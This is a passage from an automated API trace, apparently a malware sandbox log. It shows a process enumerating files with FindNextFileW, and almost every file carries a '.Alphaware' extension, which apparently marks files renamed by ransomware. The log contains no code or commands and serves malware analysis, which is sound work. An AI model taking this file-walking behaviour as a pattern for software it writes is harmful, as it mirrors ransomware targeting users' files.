cFileName="1wWkN7zA3pJvJ0l2.pdf.lnk.Alphaware", cAlternateFileName="1WWKN7~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd122dd40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd122dd40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ab82680, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd74, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Ahm.lnk.Alphaware", cAlternateFileName="2AHMLN~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb44980, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb44980, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8abce940, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2cvjqDL8AbrH.lnk.Alphaware", cAlternateFileName="2CVJQD~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfeb0920, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfeb0920, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ac1ac00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XrQR lLdHFDJW8qX.lnk.Alphaware", cAlternateFileName="2XRQRL~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10b0f80, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd10b0f80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ac66ec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a88, dwReserved0=0x0, dwReserved1=0x0, cFileName="2Y7NVeZda.lnk.Alphaware", cAlternateFileName="2Y7NVE~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfd0da00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfd0da00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ac8d020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="36j-o6P YBS6oejEQ.mkv.lnk.Alphaware", cAlternateFileName="36J-O6~1.ALP")) returned 1 [0099.795] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd108ae20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd108ae20, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8acd92e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="4A87C_8NPb.lnk.Alphaware", cAlternateFileName="4A87C_~1.ALP")) returned 1 [0099.796] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15e5fa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ad255a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1ac8, dwReserved0=0x0, dwReserved1=0x0, cFileName="4iWuq2Z09OQUcI.flv.lnk.Alphaware", cAlternateFileName="4IWUQ2~1.ALP")) returned 1 [0099.796] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf3ae360, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15e5fa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ad71860, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1334, dwReserved0=0x0, dwReserved1=0x0, cFileName="4_p930HVcZ_.lnk.Alphaware", cAlternateFileName="4_P930~1.ALP")) returned 1 [0099.796] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0db7400, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0db7400, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ade3c80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="584vk2Slwl33KAWC.lnk.Alphaware", cAlternateFileName="584VK2~1.ALP")) returned 1 [0099.796] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcef37a20, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1501760, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ae2ff40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xca0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5jdQ8S.lnk.Alphaware", cAlternateFileName="5JDQ8S~1.ALP")) returned 1 [0099.796] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bee380, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0bee380, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ae7c200, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1508, dwReserved0=0x0, dwReserved1=0x0, cFileName="5K5LME1qn8ON6owMG2.lnk.Alphaware", cAlternateFileName="5K5LME~1.ALP")) returned 1 [0099.796] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0fcc740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0fcc740, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8aec84c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2134, dwReserved0=0x0, dwReserved1=0x0, cFileName="5Oehl_lcMAlFB_Z.lnk.Alphaware", cAlternateFileName="5OEHL_~1.ALP")) returned 1 [0099.796] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1716aa0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1716aa0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8aff8fc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6jCAQWe-_9EEl7aEUjN.lnk.Alphaware", cAlternateFileName="6JCAQW~1.ALP")) returned 1 [0099.796] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd127a000, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd127a000, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b129ac0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a74, dwReserved0=0x0, dwReserved1=0x0, cFileName="7Cu9qgyf.lnk.Alphaware", cAlternateFileName="7CU9QG~1.ALP")) returned 1 [0099.796] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf870f60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf870f60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b1c2040, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x0, dwReserved1=0x0, cFileName="7ord0oMkDdqdZwcFM7PM.mkv.lnk.Alphaware", cAlternateFileName="7ORD0O~1.ALP")) returned 1 [0099.796] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd091a960, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd091a960, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b20e300, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b08, dwReserved0=0x0, dwReserved1=0x0, cFileName="7xJk20t-OlNiKzpOa_.lnk.Alphaware", cAlternateFileName="7XJK20~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce9b6740, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1573b80, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b280720, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="8wsZ.lnk.Alphaware", cAlternateFileName="8WSZLN~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd14b54a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14b54a0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b2f2b40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="96IsF-4ZdJysw7LW.lnk.Alphaware", cAlternateFileName="96ISF-~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0bc8220, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0bc8220, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b364f60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1374, dwReserved0=0x0, dwReserved1=0x0, cFileName="9WZXgiA1p9.lnk.Alphaware", cAlternateFileName="9WZXGI~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb90c40, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfb90c40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b3b1220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd88, dwReserved0=0x0, dwReserved1=0x0, cFileName="ac gZ.lnk.Alphaware", cAlternateFileName="ACGZLN~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16583c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16583c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b3fd4e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x608, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcoFPdLUL2Wyq3ljkzb.lnk.Alphaware", cAlternateFileName="ACOFPD~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd01f6760, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd01f6760, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b423640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2134, dwReserved0=0x0, dwReserved1=0x0, cFileName="ATmiRxTquKvSIqb.lnk.Alphaware", cAlternateFileName="ATMIRX~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x478c2f30, ftLastAccessTime.dwHighDateTime=0x1d706ac, ftLastWriteTime.dwLowDateTime=0x478c2f30, ftLastWriteTime.dwHighDateTime=0x1d706ac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutomaticDestinations", cAlternateFileName="AUTOMA~1")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd08ce6a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b46f900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="AZ80w8eAVF6qLdtcVJI.lnk.Alphaware", cAlternateFileName="AZ80W8~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfbdcf00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfbdcf00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b4bbbc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1374, dwReserved0=0x0, dwReserved1=0x0, cFileName="bC7JKZ.swf.lnk.Alphaware", cAlternateFileName="BC7JKZ~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe64660, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b507e80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1320, dwReserved0=0x0, dwReserved1=0x0, cFileName="beaeacczBwDfQo39.lnk.Alphaware", cAlternateFileName="BEAEAC~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1443080, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1443080, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b52dfe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BfF gcaOAo_F0B_.swf.lnk.Alphaware", cAlternateFileName="BFFGCA~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcffbb2c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffbb2c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b5a0400, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd34, dwReserved0=0x0, dwReserved1=0x0, cFileName="bIeMKBNSsvf5WRB.lnk.Alphaware", cAlternateFileName="BIEMKB~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0457d60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0457d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b5ec6c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a34, dwReserved0=0x0, dwReserved1=0x0, cFileName="bJTM1.flv.lnk.Alphaware", cAlternateFileName="BJTM1F~1.ALP")) returned 1 [0099.797] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1207be0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1207be0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b65eae0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNR8T.lnk.Alphaware", cAlternateFileName="BNR8TL~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb1e820, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b684c40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="CGtmsH0_nmfPfsQOHtip.lnk.Alphaware", cAlternateFileName="CGTMSH~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16f0940, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16f0940, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b6d0f00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xda0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CH482b9Cr-K.ots.lnk.Alphaware", cAlternateFileName="CH482B~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0562700, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0562700, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b743320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="CKk3Lv0r a.lnk.Alphaware", cAlternateFileName="CKK3LV~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0301100, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd173cc00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b78f5e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files.lnk.Alphaware", cAlternateFileName="COMMON~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795418b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x56702640, ftLastAccessTime.dwHighDateTime=0x1d9728a, ftLastWriteTime.dwLowDateTime=0x56702640, ftLastWriteTime.dwHighDateTime=0x1d9728a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x8b827b60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x320, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="DESKTO~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfaf86c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfaf86c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b84dcc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1534, dwReserved0=0x0, dwReserved1=0x0, cFileName="dFW79KlkBOtau4aDuO.lnk.Alphaware", cAlternateFileName="DFW79K~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0a715c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0a715c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b8c00e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="DITJBeUAzHRJy.ots.lnk.Alphaware", cAlternateFileName="DITJBE~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd135e840, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd135e840, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b90c3a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a60, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMtfYZ.lnk.Alphaware", cAlternateFileName="DMTFYZ~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf8e3380, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf8e3380, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b958660, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdf4, dwReserved0=0x0, dwReserved1=0x0, cFileName="dNMC XdC2fS1.lnk.Alphaware", cAlternateFileName="DNMCXD~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0ba20c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0ba20c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b9a4920, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1388, dwReserved0=0x0, dwReserved1=0x0, cFileName="Duc5tpM3PDmAXr1.ots.lnk.Alphaware", cAlternateFileName="DUC5TP~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd167e520, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd167e520, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b9f0be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd74, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZ5O.lnk.Alphaware", cAlternateFileName="DZ5OLN~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf8970c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcf8970c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ba16d40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="D_cm4s7fP.lnk.Alphaware", cAlternateFileName="D_CM4S~1.ALP")) returned 1 [0099.798] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0c3a640, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0c3a640, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8ba63000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a34, dwReserved0=0x0, dwReserved1=0x0, cFileName="E1l_XrQ6aMcGTT.lnk.Alphaware", cAlternateFileName="E1L_XR~1.ALP")) returned 1 [0099.799] 